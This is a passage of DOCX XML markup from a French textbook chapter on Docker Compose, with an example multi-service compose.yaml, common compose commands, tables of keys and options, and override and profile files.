      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="80" w:line="230" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Durée de travail : 3 h 15 · Niveau : Intermédiaire · Prérequis : chapitre 64</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Écrire un fichier Compose lisible.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Ordonner le démarrage avec les vérifications de santé.</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Gérer profils, variables et fichiers multiples.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Comprendre la reconstruction et la persistance.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Diagnostiquer un service qui ne démarre pas.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>65.1 Un fichier, une application</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Compose décrit des services, des réseaux et des volumes dans un fichier YAML versionné. Une commande recrée l'ensemble, ce qui rend l'environnement de développement reproductible.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une application complète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compose.yaml</w:t>
        <w:br/>
        <w:t>services:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  api:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    build:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      context: .</w:t>
        <w:br/>
        <w:t xml:space="preserve">      dockerfile: Dockerfile</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ports:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      - "127.0.0.1:8080:3000"</w:t>
        <w:br/>
        <w:t xml:space="preserve">    environment:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      DATABASE_URL: postgres://app:secret@db:5432/app</w:t>
        <w:br/>
        <w:t xml:space="preserve">      LOG_LEVEL: info</w:t>
        <w:br/>
        <w:t xml:space="preserve">    depends_on:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      db:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        condition: service_healthy</w:t>
        <w:br/>
        <w:t xml:space="preserve">    healthcheck:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      test: ["CMD", "wget", "-qO-", "http://127.0.0.1:3000/health"]</w:t>
        <w:br/>
        <w:t xml:space="preserve">      interval: 10s</w:t>
        <w:br/>
        <w:t xml:space="preserve">      timeout: 3s</w:t>
        <w:br/>
        <w:t xml:space="preserve">      retries: 5</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  db:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    image: postgres:16-alpine</w:t>
        <w:br/>
        <w:t xml:space="preserve">    environment:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      POSTGRES_USER: app</w:t>
        <w:br/>
        <w:t xml:space="preserve">      POSTGRES_PASSWORD: secret</w:t>
        <w:br/>
        <w:t xml:space="preserve">      POSTGRES_DB: app</w:t>
        <w:br/>
        <w:t xml:space="preserve">    volumes:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      - pgdata:/var/lib/postgresql/data</w:t>
        <w:br/>
        <w:t xml:space="preserve">    healthcheck:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      test: ["CMD-SHELL", "pg_isready -U app -d app"]</w:t>
        <w:br/>
        <w:t xml:space="preserve">      interval: 5s</w:t>
        <w:br/>
        <w:t xml:space="preserve">      timeout: 3s</w:t>
        <w:br/>
        <w:t xml:space="preserve">      retries: 10</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  cache:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    image: redis:7-alpine</w:t>
        <w:br/>
        <w:t xml:space="preserve">    command: ["redis-server", "--save", "", "--appendonly", "no"]</w:t>
        <w:br/>
        <w:br/>
        <w:t>volumes:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  pgdata:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.234 — Six clés essentielles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53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Clé</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="323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323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Remarque</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2535"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>services</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3239"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Les processus</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3239"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Un service peut avoir plusieurs réplicas</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="253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build</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="323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Construction de l'image</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="323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context</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> et </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>dockerfile</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2535"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>depends_on</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3239"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Ordre de démarrage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3239"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>N'attend pas la disponibilité seule</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="253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healthcheck</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="323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État réel du service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="323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Utilisé par </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>condition</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2535"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>volumes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3239"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Persistance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3239"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Déclarés en bas</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="253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profiles</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="323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Groupes de services</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="323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Utile en développement</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`DEPENDS_ON` AVEC CONDITION</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Forme longue qui attend que le service dépendant soit sain, et non seulement créé. Sans </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>condition</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>, Compose démarre les conteneurs dans l'ordre sans attendre qu'ils soient prêts.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>65.2 Commandes du quotidien</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Compose se pilote avec une seule commande déclinée en sous-commandes. La connaissance de cinq d'entre elles couvre presque tout l'usage quotidien.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Huit commandes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docker compose up -d            # démarrer en arrière-plan</w:t>
        <w:br/>
        <w:t>docker compose ps               # état des services</w:t>
        <w:br/>
        <w:t>docker compose logs -f api      # journaux d'un service</w:t>
        <w:br/>
        <w:t>docker compose exec api sh      # shell dans un service</w:t>
        <w:br/>
        <w:t>docker compose down             # arrêter et supprimer</w:t>
        <w:br/>
        <w:br/>
        <w:t>docker compose up -d --build    # reconstruire les images modifiées</w:t>
        <w:br/>
        <w:t>docker compose restart api</w:t>
        <w:br/>
        <w:t>docker compose down -v          # supprimer aussi les volumes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.235 — Quatre combinaisons à connaître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96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Commande</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="309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 sur les volumes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="296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 sur les images</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2960"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>down</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3094"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Conservés</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Conservées</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="296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down -v</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="309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Supprimés</w:t>
            </w:r>
          </w:p>
        </w:tc>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Conservées</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2960"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>down --rmi local</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3094"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Conservés</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Images locales supprimées</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="296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up --build</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="309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Conservés</w:t>
            </w:r>
          </w:p>
        </w:tc>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Reconstruites</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="120" w:after="0" w:line="20" w:lineRule="exact"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5580000" cy="3175000"/>
            <wp:docPr id="76" name="Picture 76"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="c00_f74.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId110"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580000" cy="3175000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 0.74 — Le cycle d'une application Compose</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`DOWN -V` DÉTRUIT LES DONNÉES</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">L'option </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>-v</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> supprime les volumes déclarés. Sur un environnement de développement c'est pratique ; sur un environnement partagé, c'est une perte de données. Vérifiez toujours la cible avant d'exécuter.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>65.3 Surcharges et environnements</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un fichier de base se combine avec des fichiers de surcharge. Cette composition évite de dupliquer la description entre développement et production.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Deux fichiers, deux usages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compose.override.yaml — utilisé automatiquement en local</w:t>
        <w:br/>
        <w:t>services:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  api:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    build:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      target: development</w:t>
        <w:br/>
        <w:t xml:space="preserve">    volumes:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      - ./src:/app/src</w:t>
        <w:br/>
        <w:t xml:space="preserve">    environment:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      LOG_LEVEL: debug</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ports:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      - "9229:9229"          # débogueur</w:t>
        <w:br/>
        <w:br/>
        <w:t># Lancement explicite avec deux fichiers</w:t>
        <w:br/>
        <w:t>docker compose -f compose.yaml -f compose.prod.yaml up -d</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un profil d'outils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Profils : ne démarrer les outils qu'à la demande</w:t>
        <w:br/>
        <w:t>services:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  api:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    # ...</w:t>
        <w:br/>
        <w:t xml:space="preserve">  mailpit:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    image: axllent/mailpit</w:t>
        <w:br/>
        <w:t xml:space="preserve">    profiles: ["dev"]</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ports: ["8025:8025"]</w:t>
        <w:br/>
        <w:br/>
        <w:t># Démarrage sans les profils</w:t>
        <w:br/>
        <w:t>docker compose up -d</w:t>
        <w:br/>
        <w:t># Démarrage avec les outils de développement</w:t>
        <w:br/>
        <w:t>docker compose --profile dev up -d</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.236 — Cinq fichiers et leur rôle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09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Fichier</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="296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296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Versionné</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3094"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
